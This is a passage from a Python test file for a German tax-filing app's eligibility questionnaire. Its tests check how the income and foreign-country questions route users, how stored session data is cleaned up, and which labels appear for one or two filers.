                MarginalEmploymentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, True,
                form_data=ImmutableMultiDict({'marginal_employment_eligibility': 'yes'}))
            expected_url = step.url_for_step(IncomeOtherDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()

        self.assertEqual(expected_url, step.render_info.next_url)

    def test_if_session_data_correct_then_set_prev_input_step_correctly(self):
        """On GET, prev_url points back to the employment decision step."""
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                MarginalEmploymentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            expected_url = step.url_for_step(EmploymentDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()

        self.assertEqual(expected_url, step.render_info.prev_url)

    def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
        """Answering 'no' routes to the marginal-employment failure display step."""
        with self.app.test_request_context(method='POST') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                MarginalEmploymentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, True,
                form_data=ImmutableMultiDict({'marginal_employment_eligibility': 'no'}))
            expected_url = step.url_for_step(MarginalEmploymentIncomeEligibilityFailureDisplaySteuerlotseStep.name)
            step.handle()

        self.assertEqual(expected_url, step.render_info.next_url)

    @pytest.mark.usefixtures('test_request_context')
    def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
        """Missing prerequisite answers surface as IncorrectEligibilityData."""
        with patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
                   MagicMock(side_effect=PreviousFieldsMissingError)):
            step = EligibilityStepChooser('eligibility').get_correct_step(
                MarginalEmploymentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, True,
                form_data=ImmutableMultiDict({'marginal_employment_eligibility': 'yes'}))
            self.assertRaises(IncorrectEligibilityData, step.handle)

    def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
        """Unknown keys are stripped from the stored session data on GET."""
        session_data = {'marital_status_eligibility': 'single',
                        'separated_since_last_year_eligibility': 'no',
                        'user_a_has_elster_account_eligibility': 'no',
                        'user_b_has_elster_account_eligibility': 'no',
                        'joint_taxes_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'no',
                        'minimal_investment_income_eligibility': 'yes',
                        'taxed_investment_income_eligibility': 'no',
                        'cheaper_check_eligibility': 'no',
                        'employment_income_eligibility': 'no',
                        'marginal_employment_eligibility': 'yes', }
        session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}

        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                MarginalEmploymentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step.handle()

            self.assertEqual(session_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
        """Session data that is already valid for this step stays untouched."""
        session_data = {'marital_status_eligibility': 'single',
                        'separated_since_last_year_eligibility': 'no',
                        'user_a_has_elster_account_eligibility': 'no',
                        'user_b_has_elster_account_eligibility': 'no',
                        'joint_taxes_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'no',
                        'minimal_investment_income_eligibility': 'yes',
                        'taxed_investment_income_eligibility': 'no',
                        'cheaper_check_eligibility': 'no',
                        'employment_income_eligibility': 'no',
                        'marginal_employment_eligibility': 'yes', }

        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                MarginalEmploymentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step.handle()

            self.assertEqual(session_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
        """From a full session, only the keys relevant up to this step survive."""
        only_necessary_data = {'marital_status_eligibility': 'single',
                               'separated_since_last_year_eligibility': 'no',
                               'separated_lived_together_eligibility': 'no',
                               'separated_joint_taxes_eligibility': 'no',
                               'user_a_has_elster_account_eligibility': 'no',
                               'user_b_has_elster_account_eligibility': 'no',
                               'joint_taxes_eligibility': 'no',
                               'alimony_eligibility': 'no',
                               'pension_eligibility': 'yes',
                               'investment_income_eligibility': 'no',
                               'minimal_investment_income_eligibility': 'yes',
                               'taxed_investment_income_eligibility': 'no',
                               'cheaper_check_eligibility': 'no',
                               'employment_income_eligibility': 'no',
                               'marginal_employment_eligibility': 'yes', }

        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                MarginalEmploymentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step.handle()

            self.assertEqual(only_necessary_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
class TestIncomeOtherEligibilityFailureDisplaySteuerlotseStep(unittest.TestCase):
    """Tests for the failure page shown when other income disqualifies the user."""

    @pytest.fixture(autouse=True)
    def attach_fixtures(self, test_request_context):
        # Keep a handle on the request context so each test runs inside one.
        self.req = test_request_context

    def test_handle_sets_correct_prev_url(self):
        """handle() must link back to the other-income decision step."""
        failure_step_cls = IncomeOtherEligibilityFailureDisplaySteuerlotseStep
        step = failure_step_cls(
            endpoint='eligibility',
            render_info=failure_step_cls.prepare_render_info({}))
        expected_url = step.url_for_step(
            IncomeOtherDecisionEligibilityInputFormSteuerlotseStep.name)

        step.handle()

        self.assertEqual(expected_url, step.render_info.prev_url)
class TestIncomeOtherDecisionEligibilityInputFormSteuerlotseStep(unittest.TestCase):
    """Tests for the 'other income' yes/no decision step of the eligibility flow.

    Covers forward routing for both answers, the two possible previous steps
    (employment decision vs. marginal-employment decision), session cleanup on
    GET, and singular/plural choice labels.
    """

    @pytest.fixture(autouse=True)
    def attach_fixtures(self, app):
        # Bridge the pytest `app` fixture into this unittest-style class.
        self.app = app

    def setUp(self):
        # Valid answer path up to and including the other-income question.
        self.correct_session_data = {'marital_status_eligibility': 'single',
                                     'separated_since_last_year_eligibility': 'no',
                                     'user_a_has_elster_account_eligibility': 'no',
                                     'user_b_has_elster_account_eligibility': 'no',
                                     'joint_taxes_eligibility': 'no',
                                     'alimony_eligibility': 'no',
                                     'pension_eligibility': 'yes',
                                     'investment_income_eligibility': 'no',
                                     'minimal_investment_income_eligibility': 'yes',
                                     'taxed_investment_income_eligibility': 'no',
                                     'cheaper_check_eligibility': 'no',
                                     'employment_income_eligibility': 'no',
                                     'other_income_eligibility': 'no'}

    def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
        """Answering 'no' routes forward to the foreign-countries decision step."""
        with self.app.test_request_context(method='POST') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                IncomeOtherDecisionEligibilityInputFormSteuerlotseStep.name, True,
                form_data=ImmutableMultiDict({'other_income_eligibility': 'no'}))
            expected_url = step.url_for_step(ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()

        self.assertEqual(expected_url, step.render_info.next_url)

    def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
        """Answering 'yes' routes to the other-income failure display step."""
        with self.app.test_request_context(method='POST') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                IncomeOtherDecisionEligibilityInputFormSteuerlotseStep.name, True,
                form_data=ImmutableMultiDict({'other_income_eligibility': 'yes'}))
            expected_url = step.url_for_step(IncomeOtherEligibilityFailureDisplaySteuerlotseStep.name)
            step.handle()

        self.assertEqual(expected_url, step.render_info.next_url)

    def test_if_no_employment_income_session_data_correct_then_set_prev_url_correct(self):
        """Without employment income, prev is the employment decision step."""
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                IncomeOtherDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            expected_url = step.url_for_step(EmploymentDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()

        self.assertEqual(expected_url, step.render_info.prev_url)

    def test_if_employment_income_but_marginal_session_data_correct_then_set_prev_url_correct(self):
        """With marginal employment income, prev is the marginal-employment step."""
        alternative_data = {**self.correct_session_data.copy(),
                            **{'employment_income_eligibility': 'yes',
                               'marginal_employment_eligibility': 'yes'}}

        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(alternative_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                IncomeOtherDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            expected_url = step.url_for_step(MarginalEmploymentIncomeDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()

        self.assertEqual(expected_url, step.render_info.prev_url)

    @pytest.mark.usefixtures('test_request_context')
    def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
        """Missing prerequisite answers surface as IncorrectEligibilityData."""
        with patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
                   MagicMock(side_effect=PreviousFieldsMissingError)):
            step = EligibilityStepChooser('eligibility').get_correct_step(
                IncomeOtherDecisionEligibilityInputFormSteuerlotseStep.name, True,
                form_data=ImmutableMultiDict({'other_income_eligibility': 'no'}))
            self.assertRaises(IncorrectEligibilityData, step.handle)

    def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
        """Unknown keys are stripped from the stored session data on GET."""
        session_data = {'marital_status_eligibility': 'single',
                        'separated_since_last_year_eligibility': 'no',
                        'user_a_has_elster_account_eligibility': 'no',
                        'user_b_has_elster_account_eligibility': 'no',
                        'joint_taxes_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'no',
                        'minimal_investment_income_eligibility': 'yes',
                        'taxed_investment_income_eligibility': 'no',
                        'cheaper_check_eligibility': 'no',
                        'employment_income_eligibility': 'no',
                        'marginal_employment_eligibility': 'yes',
                        'other_income_eligibility': 'no'}
        session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}

        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                IncomeOtherDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step.handle()

            self.assertEqual(session_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
        """Session data that is already valid for this step stays untouched."""
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                IncomeOtherDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step.handle()

            self.assertEqual(self.correct_session_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
        """From a full session, only the keys relevant up to this step survive."""
        only_necessary_data = {'marital_status_eligibility': 'single',
                               'separated_since_last_year_eligibility': 'no',
                               'separated_lived_together_eligibility': 'no',
                               'separated_joint_taxes_eligibility': 'no',
                               'user_a_has_elster_account_eligibility': 'no',
                               'user_b_has_elster_account_eligibility': 'no',
                               'joint_taxes_eligibility': 'no',
                               'alimony_eligibility': 'no',
                               'pension_eligibility': 'yes',
                               'investment_income_eligibility': 'no',
                               'minimal_investment_income_eligibility': 'yes',
                               'taxed_investment_income_eligibility': 'no',
                               'cheaper_check_eligibility': 'no',
                               'employment_income_eligibility': 'no',
                               'marginal_employment_eligibility': 'yes',
                               'other_income_eligibility': 'no'}

        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                IncomeOtherDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step.handle()

            self.assertEqual(only_necessary_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_multiple_users_then_show_multiple_text(self):
        """Married joint-taxes data (two users) selects the plural choice labels."""
        session_data = {'marital_status_eligibility': 'married',
                        'separated_since_last_year_eligibility': 'no',
                        'joint_taxes_eligibility': 'yes',
                        'user_a_has_elster_account_eligibility': 'no',
                        'user_b_has_elster_account_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'no',
                        'taxed_investment_income_eligibility': 'no',
                        'employment_income_eligibility': 'no',
                        'marginal_employment_eligibility': 'yes'}
        expected_number_of_users = 2
        expected_choices = [('yes', ngettext('form.eligibility.income_other.yes', 'form.eligibility.income_other.yes', num=expected_number_of_users)),
                            ('no', ngettext('form.eligibility.income_other.no', 'form.eligibility.income_other.no', num=expected_number_of_users))]

        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                IncomeOtherDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            # _pre_handle is enough to build the form; full handle() not needed here.
            step._pre_handle()

            self.assertEqual(expected_choices, step.render_info.form.other_income_eligibility.choices)

    def test_if_single_user_then_show_single_text(self):
        """Single-user data selects the singular choice labels."""
        session_data = {'marital_status_eligibility': 'single',
                        'separated_since_last_year_eligibility': 'no',
                        'user_a_has_elster_account_eligibility': 'no',
                        'user_b_has_elster_account_eligibility': 'no',
                        'joint_taxes_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'no',
                        'taxed_investment_income_eligibility': 'no',
                        'employment_income_eligibility': 'no',
                        'marginal_employment_eligibility': 'yes'}
        expected_number_of_users = 1
        expected_choices = [('yes', ngettext('form.eligibility.income_other.yes', 'form.eligibility.income_other.yes', num=expected_number_of_users)),
                            ('no', ngettext('form.eligibility.income_other.no', 'form.eligibility.income_other.no', num=expected_number_of_users))]

        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                IncomeOtherDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step._pre_handle()

            self.assertEqual(expected_choices, step.render_info.form.other_income_eligibility.choices)
class TestForeignCountriesEligibilityFailureDisplaySteuerlotseStep(unittest.TestCase):
    """Tests for the failure page shown when foreign-country input ends the eligibility flow."""

    @pytest.fixture(autouse=True)
    def attach_fixtures(self, test_request_context):
        self.req = test_request_context

    def test_handle_sets_correct_prev_url(self):
        # Build the step directly (no step chooser) and verify that handle()
        # points the back-link at the foreign-countries decision step.
        render_info = ForeignCountriesEligibilityFailureDisplaySteuerlotseStep.prepare_render_info({})
        step = ForeignCountriesEligibilityFailureDisplaySteuerlotseStep(
            endpoint='eligibility', render_info=render_info)
        expected_prev_url = step.url_for_step(ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name)

        step.handle()

        self.assertEqual(expected_prev_url, step.render_info.prev_url)
class TestForeignCountriesDecisionEligibilityInputFormSteuerlotseStep:
    """Tests for the foreign-country decision step: routing to success/maybe/failure,
    prev-url wiring, session-data clean-up, and pluralised choice labels."""
    # Baseline: divorced single filer, no Elster account -> eligible path.
    @pytest.fixture
    def correct_session_data(self):
        correct_session_data = {
            'marital_status_eligibility': 'divorced', 'joint_taxes_eligibility': 'no', 'alimony_eligibility': 'no',
            'user_a_has_elster_account_eligibility': 'no', 'pension_eligibility': 'yes',
            'investment_income_eligibility': 'yes', 'minimal_investment_income_eligibility': 'no',
            'taxed_investment_income_eligibility': 'yes', 'cheaper_check_eligibility': 'no',
            'employment_income_eligibility': 'yes', 'marginal_employment_eligibility': 'yes',
            'other_income_eligibility': 'no'}
        return correct_session_data
    # Variant: both user A and user B already have Elster accounts.
    @pytest.fixture
    def correct_session_data_users_have_elster(self):
        correct_session_data = {
            'marital_status_eligibility': 'divorced', 'joint_taxes_eligibility': 'no', 'alimony_eligibility': 'no',
            'user_a_has_elster_account_eligibility': 'yes', 'user_b_has_elster_account_eligibility': 'yes',
            'pension_eligibility': 'yes', 'investment_income_eligibility': 'yes', 'minimal_investment_income_eligibility': 'no',
            'taxed_investment_income_eligibility': 'yes', 'cheaper_check_eligibility': 'no',
            'employment_income_eligibility': 'yes', 'marginal_employment_eligibility': 'yes',
            'other_income_eligibility': 'no'}
        return correct_session_data
    # Variant: only user A has an Elster account.
    @pytest.fixture
    def correct_session_data_user_a_have_elster(self):
        correct_session_data = {
            'marital_status_eligibility': 'divorced', 'joint_taxes_eligibility': 'no', 'alimony_eligibility': 'no',
            'user_a_has_elster_account_eligibility': 'yes', 'user_b_has_elster_account_eligibility': 'no',
            'pension_eligibility': 'yes', 'investment_income_eligibility': 'yes', 'minimal_investment_income_eligibility': 'no',
            'taxed_investment_income_eligibility': 'yes', 'cheaper_check_eligibility': 'no',
            'employment_income_eligibility': 'yes', 'marginal_employment_eligibility': 'yes',
            'other_income_eligibility': 'no'}
        return correct_session_data
    # Variant: single filer where user A has an Elster account.
    # NOTE(review): 'single' combined with 'joint_taxes_eligibility': 'yes' looks
    # inconsistent — presumably intentional for the "maybe" routing; confirm.
    @pytest.fixture
    def correct_session_data_single_user_a_have_elster(self):
        correct_session_data = {
            'marital_status_eligibility': 'single', 'joint_taxes_eligibility': 'yes', 'alimony_eligibility': 'no',
            'user_a_has_elster_account_eligibility': 'yes', 'pension_eligibility': 'yes',
            'investment_income_eligibility': 'yes', 'minimal_investment_income_eligibility': 'no',
            'taxed_investment_income_eligibility': 'yes', 'cheaper_check_eligibility': 'no',
            'employment_income_eligibility': 'yes', 'marginal_employment_eligibility': 'yes',
            'other_income_eligibility': 'no'}
        return correct_session_data
    # POST with 'no' foreign income on the baseline data -> success step.
    def test_if_post_and_session_data_correct_and_input_data_correct_then_set_success_step(self, app, correct_session_data):
        with app.test_request_context(method='POST') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name, True,
                form_data=ImmutableMultiDict({'foreign_country_eligibility': 'no'}))
            expected_url = step.url_for_step(EligibilitySuccessDisplaySteuerlotseStep.name)
            step.handle()
            assert step.render_info.next_url == expected_url
    # Single filer with an Elster account -> routed to the "maybe" step.
    def test_if_post_and_session_data_correct_and_user_is_single_and_no_elster_account_input_data_correct_then_set_maybe_step(self, app, correct_session_data_single_user_a_have_elster):
        with app.test_request_context(method='POST') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(correct_session_data_single_user_a_have_elster)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name, True,
                form_data=ImmutableMultiDict({'foreign_country_eligibility': 'no'}))
            expected_url = step.url_for_step(EligibilityMaybeDisplaySteuerlotseStep.name)
            step.handle()
            assert step.render_info.next_url == expected_url
    # Both users have Elster accounts -> routed to the "maybe" step.
    def test_if_post_and_session_data_correct_and_both_user_has_elster_and_input_data_correct_then_set_maybe_step(self, app, correct_session_data_users_have_elster):
        with app.test_request_context(method='POST') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(correct_session_data_users_have_elster)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name, True,
                form_data=ImmutableMultiDict({'foreign_country_eligibility': 'no'}))
            expected_url = step.url_for_step(EligibilityMaybeDisplaySteuerlotseStep.name)
            step.handle()
            assert step.render_info.next_url == expected_url
    # Only user A has an Elster account -> still the success step.
    def test_if_post_and_session_data_correct_and_user_a_has_elster_and_input_data_correct_then_set_success_step(self, app, correct_session_data_user_a_have_elster):
        with app.test_request_context(method='POST') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(correct_session_data_user_a_have_elster)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name, True,
                form_data=ImmutableMultiDict({'foreign_country_eligibility': 'no'}))
            expected_url = step.url_for_step(EligibilitySuccessDisplaySteuerlotseStep.name)
            step.handle()
            assert step.render_info.next_url == expected_url
    # Answering 'yes' to foreign income -> failure step.
    def test_if_post_and_session_data_correct_and_input_data_incorrect_then_set_next_url_to_failure_step(self, app, correct_session_data):
        with app.test_request_context(method='POST') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name, True,
                ImmutableMultiDict({'foreign_country_eligibility': 'yes'}))
            expected_url = step.url_for_step(ForeignCountriesEligibilityFailureDisplaySteuerlotseStep.name)
            step.handle()
            assert step.render_info.next_url == expected_url
    # GET: the back-link must point at the "other income" decision step.
    def test_if_session_data_correct_then_set_prev_input_step_correctly(self, app, correct_session_data):
        with app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            expected_url = step.url_for_step(IncomeOtherDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            assert step.render_info.prev_url == expected_url
    # Missing prerequisite data (patched to raise) must surface as IncorrectEligibilityData.
    def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self, app):
        with app.test_request_context(method='POST'), \
                patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
                      MagicMock(side_effect=PreviousFieldsMissingError)):
            step = EligibilityStepChooser('eligibility').get_correct_step(
                ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name, True,
                form_data=ImmutableMultiDict({'other_income_eligibility': 'no',
                                              'foreign_country_eligibility': 'no'}))
            with pytest.raises(IncorrectEligibilityData):
                step.handle()
    # GET: unknown keys are stripped from the stored session data.
    def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self, app):
        session_data = {'marital_status_eligibility': 'single',
                        'separated_since_last_year_eligibility': 'no',
                        'user_a_has_elster_account_eligibility': 'no',
                        'user_b_has_elster_account_eligibility': 'no',
                        'joint_taxes_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'no',
                        'minimal_investment_income_eligibility': 'yes',
                        'taxed_investment_income_eligibility': 'no',
                        'cheaper_check_eligibility': 'no',
                        'employment_income_eligibility': 'no',
                        'marginal_employment_eligibility': 'yes',
                        'other_income_eligibility': 'no',
                        'foreign_country_eligibility': 'no'}
        session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}
        with app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step.handle()
            assert deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]) == session_data
    # GET: valid session data passes through handle() untouched.
    def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self, app, correct_session_data):
        with app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step.handle()
            assert deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]) == correct_session_data
    # GET: the full reference data set survives handle() unchanged.
    def test_if_get_and_full_data_from_session_then_delete_no_data(self, app):
        with app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step.handle()
            assert deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]) == FULL_SESSION_DATA
    # Married joint filers -> choice labels rendered with the plural form (num=2).
    def test_if_multiple_users_then_show_multiple_text(self, app):
        session_data = {'marital_status_eligibility': 'married',
                        'separated_since_last_year_eligibility': 'no',
                        'joint_taxes_eligibility': 'yes',
                        'user_a_has_elster_account_eligibility': 'no',
                        'user_b_has_elster_account_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'no',
                        'taxed_investment_income_eligibility': 'no',
                        'employment_income_eligibility': 'no',
                        'marginal_employment_eligibility': 'yes',
                        'other_income_eligibility': 'no'}
        expected_number_of_users = 2
        expected_choices = [('yes', ngettext('form.eligibility.foreign_country.yes', 'form.eligibility.foreign_country.yes', num=expected_number_of_users)),
                            ('no', ngettext('form.eligibility.foreign_country.no', 'form.eligibility.foreign_country.no', num=expected_number_of_users))]
        with app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step._pre_handle()
            assert step.render_info.form.foreign_country_eligibility.choices == expected_choices
    # Single filer -> choice labels rendered with the singular form (num=1).
    def test_if_single_user_then_show_single_text(self, app):
        session_data = {'marital_status_eligibility': 'single',
                        'separated_since_last_year_eligibility': 'no',
                        'user_a_has_elster_account_eligibility': 'no',
                        'user_b_has_elster_account_eligibility': 'no',
                        'joint_taxes_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'no',
                        'taxed_investment_income_eligibility': 'no',
                        'employment_income_eligibility': 'no',
                        'marginal_employment_eligibility': 'yes',
                        'other_income_eligibility': 'no'}
        expected_number_of_users = 1
        expected_choices = [('yes', ngettext('form.eligibility.foreign_country.yes', 'form.eligibility.foreign_country.yes', num=expected_number_of_users)),
                            ('no', ngettext('form.eligibility.foreign_country.no', 'form.eligibility.foreign_country.no', num=expected_number_of_users))]
        with app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step._pre_handle()
            assert step.render_info.form.foreign_country_eligibility.choices == expected_choices
class TestEligibilitySuccessDisplaySteuerlotseStep(unittest.TestCase):
    """Tests for the success page: prev-url wiring and the 'dependent_notes'
    extra hints derived from the stored eligibility answers."""
    @pytest.fixture(autouse=True)
    def attach_fixtures(self, test_request_context, app):
        self.req = test_request_context
        self.app = app
    # The back-link must point at the foreign-countries decision step.
    def test_if_session_data_correct_then_set_prev_input_step_correctly(self):
        correct_session_data = {'marital_status_eligibility': 'single',
                                'user_a_has_elster_account_eligibility': 'no',
                                'alimony_eligibility': 'no',
                                'pension_eligibility': 'yes',
                                'investment_income_eligibility': 'no',
                                'taxed_investment_income_eligibility': 'no',
                                'employment_income_eligibility': 'no',
                                'other_income_eligibility': 'no',
                                'foreign_country_eligibility': 'no'}
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                EligibilitySuccessDisplaySteuerlotseStep.name, False, ImmutableMultiDict({}))
            expected_url = step.url_for_step(ForeignCountriesDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(expected_url, step.render_info.prev_url)
    # User B without an Elster account -> registration hint is added.
    # '_' is patched to the identity so notes compare as raw text ids.
    def test_if_user_b_has_no_elster_account_then_set_correct_info(self):
        expected_information = [_('form.eligibility.result-note.user_b_elster_account-registration-success')]
        session_data = {'marital_status_eligibility': 'married',
